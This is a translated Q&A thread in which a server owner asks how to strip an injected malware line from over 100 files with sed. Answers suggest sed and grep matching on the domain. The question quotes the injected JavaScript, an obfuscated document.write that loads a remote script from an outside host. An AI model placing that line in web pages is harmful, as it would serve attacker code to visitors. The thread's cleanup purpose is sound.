【问题标题】:How To Remove A Malicious Javascript Code From Multiple Files如何从多个文件中删除恶意 Javascript 代码
【发布时间】:2012-11-16 05:45:02
【问题描述】:

最近我的 linux 服务器感染了恶意软件,结果,我有 100 多个文件被一行 Javascript 代码感染:

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');

手动删除它太累了,所以我研究了谷歌(不太了解 linux 并没有帮助),发现我可以为此目的使用 sed。

不幸的是,我无法逃脱这条线,所以我可以使用

sed -i.bak '/line of text/d' *

语法,它充满了单引号、双引号和反斜杠。

我该如何转义字符串,或者有其他更简单的方法吗?

【问题讨论】:

  • 顺便说一句,这些是斜杠,而不是反斜杠,您可以在sed 中使用其他分隔符,这样您就不必进行太多的转义。 sed '\|text/with/slashes|d'。不幸的是,引号是另一回事。

标签: sed escaping malware


【解决方案1】:

您能不能只使用 sed 删除任何包含例如alienradar.ru 或其他仅存在于攻击行中的子字符串的行?比如:

sed -i.bak '/alienradar.ru/d' *

【讨论】:

  • 我能否获得一份受影响文件的列表?
  • @Ugur Sahin:您可以使用 'grep -c alienradar *' 获取受影响文件的列表,其中 -c 标志告诉 grep 计算每个文件中匹配的行数,而不是打印每个匹配行。
【解决方案2】:

http://www.configureweb.com/post/how-to-change-html-code-in-multiple-files-at-once 从服务器下载所有文件并重新上传后,请按照此操作

【讨论】:

    猜你喜欢
    • 2017-02-12
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 2020-08-26
    • 1970-01-01
    • 1970-01-01
    • 2011-12-28
    • 1970-01-01
    相关资源
    最近更新 更多